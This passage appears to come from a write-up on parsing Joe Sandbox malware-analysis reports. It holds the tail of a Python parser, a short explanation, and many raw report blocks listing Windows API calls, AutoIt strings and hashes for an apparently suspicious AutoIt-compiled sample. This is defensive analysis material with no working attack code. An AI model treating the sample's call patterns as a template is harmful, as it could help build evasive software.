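    meta: dict = field(default_factory=dict)


def parse_block(text: str) -> FunctionBlock:
    block, section = FunctionBlock(), None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped in SECTIONS:
            section = stripped
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if not m:
                raise ValueError(f"unparsed API line: {line!r}")
            args = m["args"].split(",") if m["args"] is not None else []
            block.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["callee"]))
        elif section in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            m = META_LINE.match(line)
            if m:
                block.meta[m["key"].strip()] = m["value"].strip()
    return block


def direct_calls(block: FunctionBlock) -> list:
    """Calls made by the function body itself, excluding subcall attributions."""
    return [c for c in block.calls if c.callee is None]


def imports_by_module(block: FunctionBlock) -> dict:
    """Distinct API names per module (subcalls included), so Win32 imports can be
    told apart from CRT helpers (LIBCMT) at a glance."""
    out = {}
    for c in block.calls:
        out.setdefault(c.module, set()).add(c.name)
    return {mod: sorted(names) for mod, names in sorted(out.items())}


def dump_fields(block: FunctionBlock) -> list:
    """Split the dotted .sdmp name from 'Source File' into its eight fields.
    The report does not document what each field means; this only splits them."""
    name = block.meta.get("Source File", "").split(",", 1)[0]
    return name[: -len(".sdmp")].split(".") if name.endswith(".sdmp") else []


if __name__ == "__main__":
    b = parse_block(SAMPLE_BLOCK)
    for c in b.calls:
        via = f" (via subcall {c.callee})" if c.callee else ""
        print(f"{c.ref} {c.module}!{c.name} args={len(c.args)} unresolved={c.unresolved()}{via}")
    print(imports_by_module(b))
    print(b.meta["API ID"], dump_fields(b))
```

Fed the whole report one block at a time (split on the "APIs" header), this yields a per-function call list that can be filtered, for instance for functions whose direct calls pair QueryPerformanceCounter with Sleep as in the block above, or grouped by Instruction Fuzzy Hash to spot functions the plugin considers similar. The "?" slots are kept as literal strings on purpose: how many arguments the plugin could not recover is itself useful when judging how much to trust a listed call.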
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FFD84D
                                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FFD864
                                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FFD879
                                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FFD897
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1352324309-0
                                                                                                                                    • Opcode ID: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                                                                                    • Instruction ID: 164ef2811ac4b4602b285760be0b24c0c5ca0cd64d35d4d1d661268855c29d4d
                                                                                                                                    • Opcode Fuzzy Hash: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                                                                                    • Instruction Fuzzy Hash: 17115E75606309EBE3309F50D808FA6BBBDEF00B80F208569E656D6090D7B5E549EBA1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                    • Instruction ID: efab7856542bdcbc5f6ee6ad28e5b98e25f0904309f4939d9a23e7c2cf55c7e2
                                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                    • Instruction Fuzzy Hash: 03014B7244824ABBCF166F84DC05CEE3F63BB18360B588456FA1858271E336D9B1BB81
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0102B2E4
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102B2FC
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102B320
                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0102B33B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                    • Opcode ID: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
                                                                                                                                    • Instruction ID: 40509005baa930f25b530997f7174a1419aa7a92fa66670fdb8510498bf5f0c6
                                                                                                                                    • Opcode Fuzzy Hash: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
                                                                                                                                    • Instruction Fuzzy Hash: 271144B9D0020AEFDB51DFA9C4849EEFBF9FF08210F108156E954E3614D735AA558F50
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0102B644
                                                                                                                                    • _memset.LIBCMT ref: 0102B653
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01066F20,01066F64), ref: 0102B682
                                                                                                                                    • CloseHandle.KERNEL32 ref: 0102B694
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3277943733-0
                                                                                                                                    • Opcode ID: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                                                                                    • Instruction ID: 8e39ca2223a3c760753a1ede79492782288d192eeea404c32e31761efb1a2caf
                                                                                                                                    • Opcode Fuzzy Hash: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                                                                                    • Instruction Fuzzy Hash: 1EF082B25403017BF2302B65AC16FBB3A9CEB18395F804020FA89E5196DBBB4C0097A8
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 01006BE6
                                                                                                                                      • Part of subcall function 010076C4: _memset.LIBCMT ref: 010076F9
                                                                                                                                    • _memmove.LIBCMT ref: 01006C09
                                                                                                                                    • _memset.LIBCMT ref: 01006C16
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 01006C26
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 48991266-0
                                                                                                                                    • Opcode ID: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                                                                                    • Instruction ID: 2d4629ed3d6a344022bf07ae58543245c1337d648528c46f04296a0d0bc13239
                                                                                                                                    • Opcode Fuzzy Hash: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                                                                                    • Instruction Fuzzy Hash: 7AF0543A100101ABCF126F95DC85E8ABB29EF56360F04C055FE499E25ACB35E811DBB4
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
                                                                                                                                      • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA135C
                                                                                                                                      • Part of subcall function 00FA12F3: BeginPath.GDI32(?), ref: 00FA1373
                                                                                                                                      • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA139C
                                                                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0102BD40
                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 0102BD4D
                                                                                                                                    • EndPath.GDI32(00000000), ref: 0102BD5D
                                                                                                                                    • StrokePath.GDI32(00000000), ref: 0102BD6B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                    • Opcode ID: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                                                                                    • Instruction ID: 841802188c55f453ebc0130276319a9f9a68f3bcaf3b550fe3cbc5f31240f156
                                                                                                                                    • Opcode Fuzzy Hash: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                                                                                    • Instruction Fuzzy Hash: 29F0823100126ABBDB326F54AC09FCE3FA9AF06751F244140FA91610D58B7E5561DFA9
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00FA2231
                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00FA223B
                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00FA2250
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00FA2258
                                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 00FDBE83
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FDBE90
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00FDBEA9
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00FDBEC2
                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00FDBEE2
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00FDBEED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1946975507-0
                                                                                                                                    • Opcode ID: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                                                                                    • Instruction ID: c1467d2467fd6e4925a4ad42400969be147f366ac7ddf285217aae1efc7faa05
                                                                                                                                    • Opcode Fuzzy Hash: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                                                                                    • Instruction Fuzzy Hash: FCE06531504145AADF315F64FC0DBD83F21EB06332F248356FFA9480D587764580EB11
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00FF871B
                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8722
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FF82E6), ref: 00FF872F
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8736
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                    • Opcode ID: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                                                                                    • Instruction ID: 680de140a9d5f22817ae5418eaecc8fe528ad8f9609c45874f50fc2ad59530bf
                                                                                                                                    • Opcode Fuzzy Hash: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                                                                                    • Instruction Fuzzy Hash: 6FE04F36A112129BD7306EB05D4CB563BBCEF557E1F248858F285CA044DA2E84469750
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 00FFB4BE
Strings
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
• Instruction ID: 27cc84fe38aef31bdf757144812c91dca1a95bdfbec2b467d41d07a0cb0df6ce
• Opcode Fuzzy Hash: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
• Instruction Fuzzy Hash: 20916975600605AFDB54DF64C884B6ABBF9FF48710F24846DFA4ACB2A1DB70E841DB50
APIs
  • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
  • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
  • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
• __wcsnicmp.LIBCMT ref: 0100B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0100B0F6
Strings
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: 1a375e7b3fb353e27f196aea7d2ef2af7ee4f2ba53ad103eb694e1d240b8e2ee
• Instruction ID: 60ebc61668cd9e8464e3d90118c2d80181de915fa012f7a0d1025b200c1b9663
• Opcode Fuzzy Hash: 1a375e7b3fb353e27f196aea7d2ef2af7ee4f2ba53ad103eb694e1d240b8e2ee
• Instruction Fuzzy Hash: 9361B279A00219AFDB15DF98C891EEEB7F4EF09310F4440A9F956AB291DB74AE40CB50
APIs
• Sleep.KERNEL32(00000000), ref: 00FB2968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00FB2981
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
• Instruction ID: c7486becd3cddd189587034ea2304d3334b4d16b760bd03825a020b1c3ba0e1c
• Opcode Fuzzy Hash: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
• Instruction Fuzzy Hash: 53516CB1408744ABE320EF50DC85BAFB7E8FF86344F81885DF2D841095DBB98929DB56
APIs
  • Part of subcall function 00FA4F0B: __fread_nolock.LIBCMT ref: 00FA4F29
• _wcscmp.LIBCMT ref: 01009824
• _wcscmp.LIBCMT ref: 01009837
Strings
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
• Instruction ID: 469c8a53b0b2569999169cc8a9c9fd6ead3833444196e26bc3e9f5ada9eea702
• Opcode Fuzzy Hash: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
• Instruction Fuzzy Hash: AF41D971A0020ABAEF219BA4CC45FEFBBFDDFC5714F004469F944A7181DAB5AA049B61
APIs
• _memset.LIBCMT ref: 0101259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010125D4
Strings
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
• Instruction ID: 1c92e561d99f61328909c6c3822aab330e192ffc5e314307787479650630e1e2
• Opcode Fuzzy Hash: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
• Instruction Fuzzy Hash: DA3146B1800209EBCF01EFA5CC85EEEBFB8FF09340F100059F915A6166EB395A56DB60
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 01027B61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01027B76
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
• Instruction ID: 40f1170545f142ddace434d851e3fbc2c0b8abd5ce745f0516df758a17f186c7
• Opcode Fuzzy Hash: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
• Instruction Fuzzy Hash: 25413B74A0121A9FDB54CFA8C880BDABBF5FF48310F1001AAEA44AB341D731A951CF90
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 01026B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01026B53
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
• Instruction ID: 6158dc4b38ea7c7f36cb294698072d9f99e5537802d4bf84fe837ea5f9da1b2b
• Opcode Fuzzy Hash: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
• Instruction Fuzzy Hash: A6319E71200214AEEB119F69CC80BFB77F9FF49760F108619F9E997190DA36AC91DB60
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002911
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0100294C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                    • Opcode ID: b45c281a670a5c9c2fe4a8657754adefeed60c5c27bab6765a3da1b1da786af0
                                                                                                                                    • Instruction ID: f6f6bbd1eda1ec4ff7f0d2dd513dbd7ea86fdaa43870dbb687a65a3eb649b1bf
                                                                                                                                    • Opcode Fuzzy Hash: b45c281a670a5c9c2fe4a8657754adefeed60c5c27bab6765a3da1b1da786af0
                                                                                                                                    • Instruction Fuzzy Hash: 3C3191316003069BFB66CE9CCD89BAEBFF8EF45390F140099EAC5A61E1DB709544CB52
                                                                                                                                    APIs
                                                                                                                                    • __snwprintf.LIBCMT ref: 01013A66
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                    • API String ID: 3506404897-2584243854
                                                                                                                                    • Opcode ID: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                                                                                    • Instruction ID: 1efe95262c9f05985eac74e6ca866801c70ec09e0b884fd7692ccee9bd9f9f82
                                                                                                                                    • Opcode Fuzzy Hash: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                                                                                    • Instruction Fuzzy Hash: 3E21E471A00219AFCF10EF65CC82EAE7BB9BF45720F804459F945AF142DB38E941DB61
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01026761
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0102676C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: Combobox
                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                    • Opcode ID: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                                                                                    • Instruction ID: 42c2f03f13e41523d80608a7d3c5d037512773537a7ea9688c26c5e5dc9a3317
                                                                                                                                    • Opcode Fuzzy Hash: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                                                                                    • Instruction Fuzzy Hash: CA11E975200119AFEF618E18DC84EBB37AAFB49394F100125FD9497291E636DC5087A0
                                                                                                                                    APIs
